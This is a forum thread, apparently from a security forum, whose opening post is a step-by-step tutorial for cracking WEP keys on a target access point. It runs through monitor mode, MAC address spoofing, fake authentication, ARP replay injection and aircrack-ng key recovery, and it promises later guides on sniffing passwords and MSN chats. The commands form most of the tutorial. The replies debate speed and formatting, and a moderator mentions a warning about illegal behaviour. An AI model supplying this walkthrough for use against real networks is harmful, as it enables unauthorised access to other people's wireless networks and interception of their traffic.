I set it replaying before I do fake associations, I don't wanna miss any ARP's.now once you see authenication sucessful proceed to replay a data packet to the access point
WiFi Hacking 101
O.K folks, in this tut i am going to show you how to crack wep, Sniff non ssl & some ssl passwords over a wireless network & sniffing msn chats
Part. 1, Cracking WEP
my way of cracking wep is a little different than other ways but it gets the job done quicker than everyone else's way
so you will need backtrack 3 and a supported wifi card that can go into monitor mode (i have a ranlink 2500 card (ra0) )
open up a shell
ok so 1st we need to stop our wireless card so we do the airmon command
airmon-ng stop [wifi card extension e.g ath0]
now lets change our mac address
macchanger --mac 00:11:22:33:44:55 [wifi card extension]
now lets fire our card up in monitor mode
airmon-ng start [wifi card extension]
now we need the mac address of the AP we are hacking so lets do
airodump-ng [wifi card extension] now you will see your AP. Take note of the mac address/ BSSID and the channel, now hit CTRL+C to stop airodump jumping channels or you will come into problems later on.
now lets start capturing the data packets we need for the hack so type
airodump-ng -c [channel] -b [bssid/ mac addres of AP] -w [filename] [wifi card extension] so for example
airodump-ng -c 1 -b 01:1b:11:78:d9:f2 -w linksys ra0
once you have done that command you should see some info come up clients, mac address, channel, data ect now you should see the data filling up we need the data to get to about 10-15 thousand to crack the key so we need to speed it up we get a lot of data in a short space of time.
we are now going to use aireplay so open up another shell and type aireplay-ng -1 -0 -a [AP mac address/ bssid] -h [faked mac address] [wifi card extension] for example
aireplay-ng -1 0 -a 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0
now once you see authentication successful proceed to replay a data packet to the access point which will force it to send out lots of packets we can use to crack the key so do,
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b [ap mac address/ bssid] -h [faked mac address] [wifi card extension] for example
aireplay-ng -3 -p 0841 -c FF:FF:FF:FF:FF:FF -b 02:1b:11:78:d9:f2 -h 00:11:22:33:44:55 ra0
now aireplay will start reading the packets and once it finds one you can use for the hack it will prompt you to use that packet? just hit y then enter now on the airodump shell you will see the data filling up very fast ance it gets to 10,000 run this command:
aircrack-ng -b [mac address/ bssid] [file name you used earlier +-01.cap] for example
aircrack-ng -b 02:1b:11:78:d9:f2 linksys-01.cap
and aircrack will start decrypting the packets/ IV's and find the wep key!
if this is your first time doing wep cracking it should take about 10-20 mins at first and you will start progressing to 8 mins, 5 mins, 3 mins ect
other tuts to follow! [[its 03:45am in the uk :O]]
thanks for reading!!
will also get some screen shots up tomorrow.
I set it replaying before I do fake associations, I don't wanna miss any ARP's.now once you see authenication sucessful proceed to replay a data packet to the access point
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
I think this part gonna create some fuss.....Originally Posted by -wOne
But other than that seems ok i guess. I just don't get how this guide is faster than other ones? Also there are so many similar guides, so why reinvent the wheel?
Edit: In my opinion, the fastest way is wesside-ng or spoonwep
I have a hard time figuring out how this tutorial/method differs from any of the other tutorials out there and which part it is that would make it superior to them, apart from perhaps using the frame control option which is not specifically mentioned in many tutorials.Other than that it seems like a solid write-up on one of the most basic attacks (ARP-replay) available in aireplay-ng.
-Monkeys are like nature's humans.
Why have I never thought of that before?
In every single WEP tutorial I have read I have never stumbled upon anyone that said to start replaying before the association. Does that really work? Does a fake association really generate arp packet's on the network?
If so that would really speed up the process if no clients are connected.
- Poul Wittig
I have edited the post and let the OP of with a warning on his discussion of illegal behavior because it was a borderline offense. What bothers me more is the lack of people using spell check on their posts so I have spell checked the original post and I would encourage people to use spell check and not use l33t speak or whatever the F**k its called if you want a intelligent response from any of the senior members here.
Although the formatting is acceptable, I suggest that anyone that's including embedded commands inside of text, use the 'code' tags around those commands. It just makes it easier to read and follow.
...and the Shift key was invented for a reason.
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
Gotcha!Put the stick away, you know I <3 you....
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
Now Now ShadowKill you have to note Pureh@te did say "spell check" not grammar check :P
So with that pointed out ...... Did you really get him ?
Yes....yes I did. Perhaps not on the application of the word an, but most definitely on the misspelling of off. Need directions to Merriam's?
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
Posting Permissions